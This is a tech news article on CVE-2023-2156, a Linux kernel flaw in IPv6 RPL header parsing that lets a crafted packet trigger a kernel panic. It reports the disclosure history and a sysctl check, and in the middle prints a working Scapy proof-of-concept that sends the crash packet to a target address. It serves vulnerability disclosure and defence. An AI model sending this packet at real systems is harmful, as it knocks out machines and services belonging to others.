Linux IPv6 “Route of Death” 0day Vulnerability in the Kernel

Details of an unpatched (0-day) vulnerability (CVE-2023-2156) in the Linux kernel have been disclosed. This vulnerability allows an attacker to crash the system by sending specially crafted IPv6 packets (packet-of-death). The issue only manifests when the RPL (Routing Protocol for Low-Power and Lossy Networks) protocol support is enabled, which is typically disabled by default in distributions and primarily used in embedded devices operating in wireless networks with high packet loss.

The vulnerability is caused by incorrect handling of external data in the RPL protocol parsing code, leading to an assert failure triggering and kernel panic. When placing data obtained from parsing the IPv6 RPL packet header into the k_buff (Socket Buffer) structure, if the CmprI field is set to 15, the Segleft field is set to 1, and CmprE is set to 0, a 48-byte vector with addresses is unpacked to 528 bytes, causing a situation where the allocated buffer memory is insufficient. In this case, the skb_push function, used to place data into the structure, triggers a check for the mismatch between the data size and the buffer, resulting in a panic state to prevent buffer overflow.

Example exploit:

  # We'll use Scapy to craft the packet 
   from scapy.all import *
   import socket

   # Use the IPv6 from your LAN interface
   DST_ADDR = sys.argv[1]
   SRC_ADDR = DST_ADDR

   # We use sockets to send the packet
   sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)

   # Craft the packet
   #   Type = 3 makes this an RPL packet
   #   Addresses contains 3 addresses, but because CmprI is 15, 
   # each octet of the first two addresses is treated as a compressed address
   #   Segleft = 1 to trigger the amplification
   #   lastentry = 0xf0 sets CmprI to 15 and CmprE to 0

   p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / 
      IPv6ExtHdrSegmentRouting(type=3, addresses=["a8::", "a7::", "a6::"], segleft=1, lastentry=0xf0)

   # Send this evil packet
   sockfd.sendto(bytes(p), (DST_ADDR, 0))

It is noteworthy that the kernel developers were notified of the vulnerability as early as January 2022, and over the past 15 months, they attempted to address the issue three times by releasing patches in September 2022, October 2022, and April 2023. However, each time the fixes proved to be insufficient, and the vulnerability could still be exploited. Ultimately, the ZDI project, which coordinated the vulnerability remediation efforts, decided to disclose detailed information about the vulnerability without waiting for a functional fix in the kernel.

Thus, the vulnerability remains unpatched to this day. Additionally, the patch included in kernel 6.4-rc2 is ineffective. Users are advised to verify whether the RPL protocol is in use in their systems, which can be done using the command:

Copyright TechPlanet.today

sysctl -a | grep -i rpl_seg_enabled

In case you have found a mistake in the text, please send a message to the author by selecting the mistake and pressing Ctrl-Enter.

#Linux #IPv6 #Route #Death #0day #Vulnerability #Kernel

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More